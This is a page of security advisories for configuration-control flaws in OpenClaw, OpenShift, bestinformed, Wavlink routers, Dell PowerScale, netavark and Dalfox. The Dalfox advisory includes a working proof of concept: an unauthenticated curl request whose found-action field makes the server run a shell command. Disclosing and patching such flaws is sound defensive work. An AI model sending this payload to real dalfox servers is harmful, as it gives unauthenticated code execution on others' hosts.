Common Weakness Enumeration

CWE-15

Allowed

External Control of System or Configuration Setting

Abstraction: Base · Status: Incomplete

One or more system settings or configuration elements can be externally controlled by a user.

136 vulnerabilities reference this CWE, most recent first.

GHSA-QCJ9-WWGW-6GM8

Vulnerability from github – Published: 2026-04-03 02:47 – Updated: 2026-05-06 02:40
VLAI
Summary
OpenClaw: Workspace `.env` can override the bundled plugin trust root
Details

Summary

Workspace .env can override the bundled plugin trust root

Current Maintainer Triage

  • Status: open
  • Normalized severity: high
  • Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.

Affected Packages / Versions

  • Package: openclaw (npm)
  • Latest published npm version: 2026.3.31
  • Vulnerable version range: <=2026.3.28
  • Patched versions: >= 2026.3.31
  • First stable tag containing the fix: v2026.3.31

Fix Commit(s)

  • 330a9f98cb29c79b1c16a2117e03d6276a0d6289 — 2026-03-31T19:25:12+09:00

OpenClaw thanks @nexrin for reporting.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.3.28"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.31"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41396"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15",
      "CWE-829"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T02:47:57Z",
    "nvd_published_at": "2026-04-28T19:37:43Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.28`\n- Patched versions: `\u003e= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` \u2014 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.",
  "id": "GHSA-qcj9-wwgw-6gm8",
  "modified": "2026-05-06T02:40:28Z",
  "published": "2026-04-03T02:47:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Workspace `.env` can override the bundled plugin trust root"
}

GHSA-QMRP-JX57-5MR7

Vulnerability from github – Published: 2026-06-02 09:36 – Updated: 2026-07-02 00:31
VLAI
Details

The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1784"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-02T09:16:15Z",
    "severity": "HIGH"
  },
  "details": "The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration.",
  "id": "GHSA-qmrp-jx57-5mr7",
  "modified": "2026-07-02T00:31:39Z",
  "published": "2026-06-02T09:36:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1784"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:23241"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:23246"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:25045"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:25182"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:25194"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:26543"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:28893"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:28964"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-1784"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436075"
    },
    {
      "type": "WEB",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-1784.json"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QPWG-QXX8-4G59

Vulnerability from github – Published: 2025-02-18 09:32 – Updated: 2025-02-18 09:32
VLAI
Details

Via the GUI of the "bestinformed Infoclient", a low-privileged user is by default able to change the server address of the "bestinformed Server" to which this client connects. This is dangerous as the "bestinformed Infoclient" runs with elevated permissions ("nt authority\system"). By changing the server address to a malicious server, or a script simulating a server, the user is able to escalate his privileges by abusing certain features of the "bestinformed Web" server. Those features include: * Pushing of malicious update packages * Arbitrary Registry Read as "nt authority\system"

An attacker is able to escalate his privileges to "nt authority\system" on the Windows client running the "bestinformed Infoclient". 

This attack is not possible if a custom configuration ("Infoclient.ini") containing the flags "ShowOnTaskbar=false" or "DisabledItems=stPort,stAddress" is deployed.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-0425"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-18T08:15:10Z",
    "severity": "HIGH"
  },
  "details": "Via the GUI of the \"bestinformed Infoclient\", a low-privileged user is by default able to change the server address of the \"bestinformed Server\" to which this client connects. This is dangerous as the \"bestinformed Infoclient\" runs with elevated permissions (\"nt authority\\system\"). By changing the server address to a malicious server, or a script simulating a server, the user is able to escalate his privileges by abusing certain features of the \"bestinformed Web\" server. Those features include:\n  *  Pushing of malicious update packages\n  *  Arbitrary Registry Read as \"nt authority\\system\"\n\n\nAn attacker is able to escalate his privileges to \"nt authority\\system\" on the Windows client running the \"bestinformed Infoclient\".\u00a0\n\n\nThis attack is not possible if a custom configuration (\"Infoclient.ini\")\u00a0containing the flags \"ShowOnTaskbar=false\" or \"DisabledItems=stPort,stAddress\" is deployed.",
  "id": "GHSA-qpwg-qxx8-4g59",
  "modified": "2025-02-18T09:32:45Z",
  "published": "2025-02-18T09:32:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0425"
    },
    {
      "type": "WEB",
      "url": "https://www.cordaware.com/changelog/en/version-6_3_8_1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-QXH2-8JW8-HX7G

Vulnerability from github – Published: 2025-01-14 15:30 – Updated: 2025-11-04 00:32
VLAI
Details

Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the ftp_max_sessions POST parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39795"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-14T15:15:24Z",
    "severity": "CRITICAL"
  },
  "details": "Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `ftp_max_sessions` POST parameter.",
  "id": "GHSA-qxh2-8jw8-hx7g",
  "modified": "2025-11-04T00:32:17Z",
  "published": "2025-01-14T15:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39795"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2053"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2053"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R3RJ-4MRF-V5MF

Vulnerability from github – Published: 2025-01-14 15:30 – Updated: 2025-11-04 00:32
VLAI
Details

Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the sel_open_interface POST parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39799"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-14T15:15:25Z",
    "severity": "CRITICAL"
  },
  "details": "Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `sel_open_interface` POST parameter.",
  "id": "GHSA-r3rj-4mrf-v5mf",
  "modified": "2025-11-04T00:32:17Z",
  "published": "2025-01-14T15:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39799"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RC26-62RX-429V

Vulnerability from github – Published: 2026-03-04 15:30 – Updated: 2026-03-04 15:30
VLAI
Details

Dell PowerScale OneFS, versions 9.10.0.0 through 9.10.1.5 and versions 9.11.0.0 through 9.12.0.1, contains an external control of system or configuration setting vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to protection mechanism bypass.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21422"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-04T13:15:57Z",
    "severity": "LOW"
  },
  "details": "Dell PowerScale OneFS, versions 9.10.0.0 through 9.10.1.5 and versions 9.11.0.0 through 9.12.0.1, contains an external control of system or configuration setting vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to protection mechanism bypass.",
  "id": "GHSA-rc26-62rx-429v",
  "modified": "2026-03-04T15:30:34Z",
  "published": "2026-03-04T15:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21422"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-sg/000432452/dsa-2026-038-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RHVX-9VR4-VMG9

Vulnerability from github – Published: 2025-01-14 15:30 – Updated: 2025-11-04 00:32
VLAI
Details

Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the sel_open_protocol POST parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39798"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-14T15:15:24Z",
    "severity": "CRITICAL"
  },
  "details": "Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `sel_open_protocol` POST parameter.",
  "id": "GHSA-rhvx-9vr4-vmg9",
  "modified": "2025-11-04T00:32:17Z",
  "published": "2025-01-14T15:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39798"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RPCF-RMH6-42XR

Vulnerability from github – Published: 2025-07-28 21:31 – Updated: 2026-06-04 20:12
VLAI
Summary
Netavark Has Possible DNS Resolve Confusion
Details

A vulnerability was found in the netavark package, a network stack for containers used with Podman. Due to dns.podman search domain being removed, netavark may return external servers if a valid A/AAAA record is sent as a response. When creating a container with a given name, this name will be used as the hostname for the container itself, as the podman's search domain is not added anymore the container is using the host's resolv.conf, and the DNS resolver will try to look into the search domains contained on it. If one of the domains contain a name with the same hostname as the running container, the connection will forward to unexpected external servers.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "netavark"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-8283"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-29T19:56:11Z",
    "nvd_published_at": "2025-07-28T19:15:43Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was found in the netavark package, a network stack for containers used with Podman. Due to dns.podman search domain being removed, netavark may return external servers if a valid A/AAAA record is sent as a response. When creating a container with a given name, this name will be used as the hostname for the container itself, as the podman\u0027s search domain is not added anymore the container is using the host\u0027s resolv.conf, and the DNS resolver will try to look into the search domains contained on it. If one of the domains contain a name with the same hostname as the running container, the connection will forward to unexpected external servers.",
  "id": "GHSA-rpcf-rmh6-42xr",
  "modified": "2026-06-04T20:12:42Z",
  "published": "2025-07-28T21:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8283"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/podman/issues/2619"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/podman/issues/26198"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/netavark/pull/1256"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/netavark/commit/068abc869b736a03a947b5419c102da73830e882"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2025-8283"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383941"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-rpcf-rmh6-42xr"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/containers/netavark"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/netavark/releases/tag/v1.15.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Netavark Has Possible DNS Resolve Confusion "
}

GHSA-V25V-M36W-JP4H

Vulnerability from github – Published: 2026-05-12 15:07 – Updated: 2026-06-08 23:50
VLAI
Summary
Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`
Details

GHSA: Unauthenticated Remote Code Execution via found-action in Dalfox Server Mode

Summary

When dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.

Severity

Critical (CVSS 3.1: 10.0)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

  • Attack Vector: Network — the server binds to 0.0.0.0 by default; reachable by any network peer.
  • Attack Complexity: Low — the attacker fully controls the scanned URL and can trivially host a one-line reflective server to guarantee a finding is triggered.
  • Privileges Required: None — no API key is enforced in the default configuration.
  • User Interaction: None.
  • Scope: Changed — exploitation escapes the dalfox process boundary and executes arbitrary commands on the host OS.
  • Confidentiality Impact: High — full read access to the host filesystem and secrets in the process environment.
  • Integrity Impact: High — arbitrary file writes, code deployment, persistence mechanisms.
  • Availability Impact: High — process kill, resource exhaustion, service disruption.

Affected Component

  • cmd/server.goinit() (line 51): --api-key defaults to ""
  • pkg/server/server.gosetupEchoServer() (line 68): auth middleware only registered when APIKey != ""
  • pkg/server/server.gopostScanHandler() (lines 173–191): rq.Options passed to ScanFromAPI without sanitization
  • lib/func.goInitialize() (lines 118–119): FoundAction / FoundActionShell explicitly propagated from caller options
  • pkg/scanning/foundaction.gofoundAction() (lines 17–18): exec.Command(options.FoundActionShell, "-c", afterCmd) executed unconditionally

CWE

  • CWE-306: Missing Authentication for Critical Function
  • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  • CWE-15: External Control of System or Configuration Setting

Description

Opt-in Authentication with a Dangerous Default

cmd/server.go registers the --api-key flag with an empty string default:

// cmd/server.go:51
serverCmd.Flags().StringVar(&apiKey, "api-key", "", "Specify the API key for server authentication...")

setupEchoServer only installs the apiKeyAuth middleware when that value is non-empty:

// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
    e.Use(apiKeyAuth(options.APIKey, options))
}

A server started without --api-key accepts every request on every route with no challenge. The apiKeyAuth implementation itself is correct — the flaw is purely in the opt-in condition that makes authentication off by default.

Attacker-Controlled Options Reaches Shell Execution Without Stripping

POST /scan deserializes the full model.Options struct from the JSON body:

// pkg/server/model.go:6-8
type Req struct {
    URL     string        `json:"url"`
    Options model.Options `json:"options"`
}

// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)

model.Options exposes both execution-control fields as JSON-tagged properties:

// pkg/model/options.go:83-84
FoundAction      string `json:"found-action,omitempty"`
FoundActionShell string `json:"found-action-shell,omitempty"`

ScanFromAPI builds the scan target directly from rqOptions and passes it to dalfox.Initialize:

// pkg/server/scan.go:22-27
target := dalfox.Target{
    URL:     url,
    Method:  rqOptions.Method,
    Options: rqOptions,
}
newOptions := dalfox.Initialize(target, target.Options)

Initialize explicitly copies both fields into newOptions — there is no stripping path:

// lib/func.go:118-119
"FoundAction":      {&newOptions.FoundAction, options.FoundAction},
"FoundActionShell": {&newOptions.FoundActionShell, options.FoundActionShell},

Shell Execution on Any Finding

foundAction is called from seven locations across pkg/scanning/scanning.go and pkg/scanning/sendReq.go whenever options.FoundAction != "" and any vulnerability is detected. None of these call sites check options.IsAPI:

// pkg/scanning/foundaction.go:12-18
func foundAction(options model.Options, target, query, ptype string) {
    afterCmd := options.FoundAction
    afterCmd = strings.ReplaceAll(afterCmd, "@@query@@", query)
    afterCmd = strings.ReplaceAll(afterCmd, "@@target@@", target)
    afterCmd = strings.ReplaceAll(afterCmd, "@@type@@", ptype)
    cmd := exec.Command(options.FoundActionShell, "-c", afterCmd)
    err := cmd.Run()
    ...
}

Because the attacker supplies both the scan target URL and found-action, they trivially guarantee that a finding is produced (by hosting a one-line reflective server) and that the shell command is executed.

Proof of Concept

# Step 1 — Start a reflective XSS target (attacker-controlled)
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
    def do_GET(self):
        q = parse_qs(urlparse(self.path).query).get('q', [''])[0]
        body = f'<html><body>{q}</body></html>'.encode()
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18081), H).serve_forever()
PY

# Step 2 — Start dalfox in REST server mode (default: 0.0.0.0:6664, no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest

# Step 3 — POST unauthenticated scan request with found-action payload
curl -s -X POST http://127.0.0.1:16664/scan \
  -H 'Content-Type: application/json' \
  --data '{
    "url": "http://127.0.0.1:18081/?q=test",
    "options": {
      "found-action": "echo owned >/tmp/dalfox_rce_marker",
      "found-action-shell": "bash",
      "use-headless": false,
      "worker": 1,
      "limit-result": 1
    }
  }'

# Step 4 — Confirm arbitrary command executed on the dalfox host
cat /tmp/dalfox_rce_marker
# Expected output: owned

No X-API-KEY header is required. The reflective server ensures dalfox finds a vulnerability, which triggers foundAction.

Impact

  • Unauthenticated remote code execution on any host running dalfox server in its default configuration.
  • Full read access to secrets, configuration files, and credentials visible to the dalfox process.
  • Arbitrary file writes: persistence, backdoor installation, data exfiltration staging.
  • Lateral movement using the dalfox host's network position and credentials.
  • The default 0.0.0.0 bind address means exposure to all network interfaces, including public-facing ones in misconfigured cloud environments.

Recommended Remediation

Option 1: Require API key — make --api-key mandatory (preferred)

Reject server startup when no API key is provided and emit a loud warning. This is the lowest-risk fix because it protects all current and future routes without code changes to the scan path.

// cmd/server.go — in runServerCmd, before starting the server:
if serverType == "rest" && apiKey == "" {
    fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
    fmt.Fprintln(os.Stderr, "       Generate a key with: openssl rand -hex 32")
    os.Exit(1)
}

Option 2: Strip FoundAction / FoundActionShell from API-sourced requests

Prevent untrusted callers from setting execution-control options regardless of auth state. This adds defence-in-depth and protects authenticated deployments against credential theft.

// pkg/server/server.go — in postScanHandler, before calling ScanFromAPI:
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""

Both options should be applied together. Option 1 prevents unauthenticated access; Option 2 ensures that even authenticated callers (who may be external consumers of the REST API) cannot trigger host-level command execution.

Credit

Emmanuel David

Github:- https://github.com/drmingler

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.12.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hahwul/dalfox/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45087"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15",
      "CWE-306",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-12T15:07:59Z",
    "nvd_published_at": "2026-05-27T18:16:24Z",
    "severity": "CRITICAL"
  },
  "details": "# GHSA: Unauthenticated Remote Code Execution via `found-action` in Dalfox Server Mode\n\n## Summary\n\nWhen dalfox is started in REST API server mode (`dalfox server`), the server binds to `0.0.0.0:6664` by default and requires no API key unless the operator explicitly passes `--api-key`. Because `model.Options` \u2014 including `FoundAction` and `FoundActionShell` \u2014 is deserialized directly from attacker-supplied JSON in `POST /scan`, and because `dalfox.Initialize` explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.\n\n## Severity\n\n**Critical** (CVSS 3.1: 10.0)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`\n\n- **Attack Vector:** Network \u2014 the server binds to `0.0.0.0` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 the attacker fully controls the scanned URL and can trivially host a one-line reflective server to guarantee a finding is triggered.\n- **Privileges Required:** None \u2014 no API key is enforced in the default configuration.\n- **User Interaction:** None.\n- **Scope:** Changed \u2014 exploitation escapes the dalfox process boundary and executes arbitrary commands on the host OS.\n- **Confidentiality Impact:** High \u2014 full read access to the host filesystem and secrets in the process environment.\n- **Integrity Impact:** High \u2014 arbitrary file writes, code deployment, persistence mechanisms.\n- **Availability Impact:** High \u2014 process kill, resource exhaustion, service disruption.\n\n\n## Affected Component\n\n- `cmd/server.go` \u2014 `init()` (line 51): `--api-key` defaults to `\"\"`\n- `pkg/server/server.go` \u2014 `setupEchoServer()` (line 68): auth middleware only registered when `APIKey != \"\"`\n- `pkg/server/server.go` \u2014 `postScanHandler()` (lines 173\u2013191): `rq.Options` passed to `ScanFromAPI` without sanitization\n- `lib/func.go` \u2014 `Initialize()` (lines 118\u2013119): `FoundAction` / `FoundActionShell` explicitly propagated from caller options\n- `pkg/scanning/foundaction.go` \u2014 `foundAction()` (lines 17\u201318): `exec.Command(options.FoundActionShell, \"-c\", afterCmd)` executed unconditionally\n\n## CWE\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **CWE-78**: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n- **CWE-15**: External Control of System or Configuration Setting\n\n## Description\n\n### Opt-in Authentication with a Dangerous Default\n\n`cmd/server.go` registers the `--api-key` flag with an empty string default:\n\n```go\n// cmd/server.go:51\nserverCmd.Flags().StringVar(\u0026apiKey, \"api-key\", \"\", \"Specify the API key for server authentication...\")\n```\n\n`setupEchoServer` only installs the `apiKeyAuth` middleware when that value is non-empty:\n\n```go\n// pkg/server/server.go:68-70\nif options.ServerType == \"rest\" \u0026\u0026 options.APIKey != \"\" {\n    e.Use(apiKeyAuth(options.APIKey, options))\n}\n```\n\nA server started without `--api-key` accepts every request on every route with no challenge. The `apiKeyAuth` implementation itself is correct \u2014 the flaw is purely in the opt-in condition that makes authentication off by default.\n\n### Attacker-Controlled `Options` Reaches Shell Execution Without Stripping\n\n`POST /scan` deserializes the full `model.Options` struct from the JSON body:\n\n```go\n// pkg/server/model.go:6-8\ntype Req struct {\n    URL     string        `json:\"url\"`\n    Options model.Options `json:\"options\"`\n}\n\n// pkg/server/server.go:173-191\nrq := new(Req)\nif err := c.Bind(rq); err != nil { ... }\ngo ScanFromAPI(rq.URL, rq.Options, *options, sid)\n```\n\n`model.Options` exposes both execution-control fields as JSON-tagged properties:\n\n```go\n// pkg/model/options.go:83-84\nFoundAction      string `json:\"found-action,omitempty\"`\nFoundActionShell string `json:\"found-action-shell,omitempty\"`\n```\n\n`ScanFromAPI` builds the scan target directly from `rqOptions` and passes it to `dalfox.Initialize`:\n\n```go\n// pkg/server/scan.go:22-27\ntarget := dalfox.Target{\n    URL:     url,\n    Method:  rqOptions.Method,\n    Options: rqOptions,\n}\nnewOptions := dalfox.Initialize(target, target.Options)\n```\n\n`Initialize` explicitly copies both fields into `newOptions` \u2014 there is no stripping path:\n\n```go\n// lib/func.go:118-119\n\"FoundAction\":      {\u0026newOptions.FoundAction, options.FoundAction},\n\"FoundActionShell\": {\u0026newOptions.FoundActionShell, options.FoundActionShell},\n```\n\n### Shell Execution on Any Finding\n\n`foundAction` is called from seven locations across `pkg/scanning/scanning.go` and `pkg/scanning/sendReq.go` whenever `options.FoundAction != \"\"` and any vulnerability is detected. None of these call sites check `options.IsAPI`:\n\n```go\n// pkg/scanning/foundaction.go:12-18\nfunc foundAction(options 